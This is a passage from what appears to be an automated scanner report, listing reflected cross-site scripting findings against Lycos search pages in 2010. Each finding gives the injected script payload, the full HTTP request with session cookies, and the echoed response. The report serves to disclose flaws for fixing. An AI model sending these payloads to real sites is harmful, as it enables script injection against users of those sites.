The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a61f"><script>alert(1)</script>cb2791bb9c4 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images6a61f"><script>alert(1)</script>cb2791bb9c4 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images6a61f"><script>alert(1)</script>cb2791bb9c4&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.124. http://search.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b88f"%3balert(1)//ab61ce09937 was submitted in the cat parameter. This input was echoed as 2b88f";alert(1)//ab61ce09937 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=multi&cat=images2b88f"%3balert(1)//ab61ce09937 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_images2b88f";alert(1)//ab61ce09937";
//-->
...[SNIP]...

1.125. http://search.lycos.com/ [mobile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8ead"><script>alert(1)</script>b7a2c77f357 was submitted in the mobile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357&mobile=1">
...[SNIP]...

1.126. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca07a"><script>alert(1)</script>4cdc20754fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:33 GMT; path=/
Set-Cookie: LYCOS_SEARCH=i4ndl3gvfld9s3lgl65ehmk080; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1&mobile=1">
...[SNIP]...

1.127. http://search.lycos.com/ [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8f5"><script>alert(1)</script>616be4478a0 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:12 GMT; path=/
Set-Cookie: LYCOS_SEARCH=p6laldmb2g7ohngk9ohi37mec0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0&mobile=1">
...[SNIP]...

1.128. http://search.lycos.com/ [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34964"%3balert(1)//0334fee274d was submitted in the query parameter. This input was echoed as 34964";alert(1)//0334fee274d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=web&query=%2734964"%3balert(1)//0334fee274d&x=0&y=0&mobile=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=1; expires=Mon, 12-Dec-2011 14:35:12 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
tab = "web";
offset = 0+1;
query = "'34964";alert(1)//0334fee274d";
not_default = true;
</script>
...[SNIP]...

1.129. http://search.lycos.com/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf21"><script>alert(1)</script>170bf3715a3 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query= HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PARTNER=lycos502bf21%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E170bf3715a3
Set-Cookie: PARTNER=deleted; expires=Sat, 12-Dec-2009 14:35:02 GMT
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?src=LYCOS502bf21"><script>alert(1)</script>170bf3715a3&query=&mobile=1">
...[SNIP]...

1.130. http://search.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714e4"><script>alert(1)</script>1c8e17eea03 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web714e4"><script>alert(1)</script>1c8e17eea03&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:07 GMT; path=/
Set-Cookie: LYCOS_SEARCH=0roaos6kqiohp2a9qr66pi4uc3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_web714e4"><script>alert(1)</script>1c8e17eea03&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.131. http://search.lycos.com/ [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb19"><script>alert(1)</script>384854fefb5 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:17 GMT; path=/
Set-Cookie: LYCOS_SEARCH=3nnouoedqulhb6jgumc9falmu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0fdb19"><script>alert(1)</script>384854fefb5&y=0&mobile=1">
...[SNIP]...

1.132. http://search.lycos.com/ [y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427d8"><script>alert(1)</script>ca48fe7296 was submitted in the y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:19 GMT; path=/
Set-Cookie: LYCOS_SEARCH=opld2sr244q0u26cc1hfeg7cj7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0427d8"><script>alert(1)</script>ca48fe7296&mobile=1">
...[SNIP]...

1.133. http://search.lycos.com/image/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d10"><script>alert(1)</script>11d3b1192c5 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?tab=multi&cat=imagesb8d10"><script>alert(1)</script>11d3b1192c5 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_imagesb8d10"><script>alert(1)</script>11d3b1192c5&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.134. http://search.lycos.com/image/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67115"%3balert(1)//4e88d6bcb17 was submitted in the cat parameter. This input was echoed as 67115";alert(1)//4e88d6bcb17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /image/?tab=multi&cat=images67115"%3balert(1)//4e88d6bcb17 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_images67115";alert(1)//4e88d6bcb17";
//-->
...[SNIP]...

1.135. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc05"><script>alert(1)</script>f6d897429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /image/?acc05"><script>alert(1)</script>f6d897429=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
